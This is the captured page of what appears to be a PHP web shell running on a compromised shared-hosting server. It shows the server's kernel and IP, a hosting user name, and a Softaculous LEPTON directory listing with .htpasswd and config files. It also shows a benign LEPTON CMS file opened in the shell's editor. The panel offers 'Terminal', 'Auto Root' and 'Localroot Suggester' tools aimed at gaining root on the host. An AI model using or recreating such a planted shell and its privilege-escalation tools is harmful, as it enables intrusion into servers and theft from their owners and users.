Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.190.156.78
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
lepton /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-03-13 14:17
php53
[ DIR ]
drwxr-xr-x
2025-03-13 14:17
php56
[ DIR ]
drwxr-xr-x
2025-03-13 14:17
php71
[ DIR ]
drwxr-xr-x
2025-03-13 14:17
php81
[ DIR ]
drwxr-xr-x
2025-03-13 14:17
php82
[ DIR ]
drwxr-xr-x
2025-03-13 14:17
.htaccess
165
B
-rw-r--r--
2021-12-23 11:54
.htpasswd
103
B
-rw-r--r--
2021-12-23 11:54
cj_example.php
1.16
KB
-rw-r--r--
2025-03-13 08:02
clone.php
7.52
KB
-rw-r--r--
2025-03-13 10:41
config.php
528
B
-rw-r--r--
2025-03-13 08:02
cronjob.ini.php
868
B
-rw-r--r--
2025-03-13 08:02
edit.php
4.66
KB
-rw-r--r--
2025-03-13 10:41
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
extend.php
10.67
KB
-rw-r--r--
2025-03-13 10:41
fileindex.php
104
B
-rw-r--r--
2024-02-19 10:27
hello-world.php
149
B
-rw-r--r--
2025-03-13 08:02
import.php
3.7
KB
-rw-r--r--
2025-03-13 10:41
index.php
584
B
-rw-r--r--
2024-02-19 10:27
info.xml
2.02
KB
-rw-r--r--
2025-03-13 08:02
install.js
924
B
-rw-r--r--
2021-12-23 11:54
install.php
8.27
KB
-rw-r--r--
2025-03-13 10:41
install.xml
1.44
KB
-rw-r--r--
2023-03-03 11:45
lepton.ini.php
1.37
KB
-rw-r--r--
2025-03-13 08:02
lepton.sql
52.04
KB
-rw-r--r--
2025-03-13 08:02
lepton.zip
10.46
MB
-rw-r--r--
2025-03-13 08:02
md5
3.18
KB
-rw-r--r--
2025-03-13 10:41
notes.txt
770
B
-rw-r--r--
2022-10-07 08:20
root_.htaccess
366
B
-rw-r--r--
2024-02-19 10:27
update_pass.php
649
B
-rw-r--r--
2021-12-23 11:54
Save
Rename
<?php /** * This file is part of LEPTON Core, released under the GNU GPL * Please see LICENSE and COPYING files in your package for details, specially for terms and warranties. * * NOTICE:LEPTON CMS Package has several different licenses. * Please see the individual license in the header of each single file or info.php of modules and templates. * * @author LEPTON Project * @copyright 2010-2025 LEPTON Project * @link https://lepton-cms.org * @license https://gnu.org/licenses/gpl-3.0.html * @license_terms please see LICENSE and COPYING files in your package * */ // include secure.php to protect this file and the whole CMS! if(!defined("SEC_FILE")){define("SEC_FILE",'/framework/secure.php' );} if (defined('LEPTON_PATH')) { include LEPTON_PATH.SEC_FILE; } else { $oneback = "../"; $root = $oneback; $level = 1; while (($level < 10) && (!file_exists($root.SEC_FILE))) { $root .= $oneback; $level += 1; } if (file_exists($root.SEC_FILE)) { include $root.SEC_FILE; } else { trigger_error(sprintf("[ <b>%s</b> ] Can't include secure.php!", $_SERVER['SCRIPT_NAME']), E_USER_ERROR); } } // end include secure file